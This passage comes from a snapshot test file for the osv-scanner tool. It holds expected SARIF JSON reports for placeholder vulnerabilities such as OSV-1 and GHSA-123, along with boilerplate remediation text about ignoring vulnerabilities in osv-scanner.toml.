vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 123abc |\n| sbom:/path/to/my/second/lockfile | author3/mine3 | 0.4.1 |\n\n## 
Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], 
"webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/no_sources - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { 
"$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'GHSA-123'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "GHSA-123", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [GHSA-123](https://osv.dev/GHSA-123)**.\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to 
ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"GHSA-123\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [GHSA-123](https://osv.dev/GHSA-123)**.\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"GHSA-123\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "GHSA-123", "name": "GHSA-123", "relationships": [], "shortDescription": { "markdown": "GHSA-123: Something scarier!", "text": "GHSA-123: Something scarier!" 
} }, { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = 
\"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], 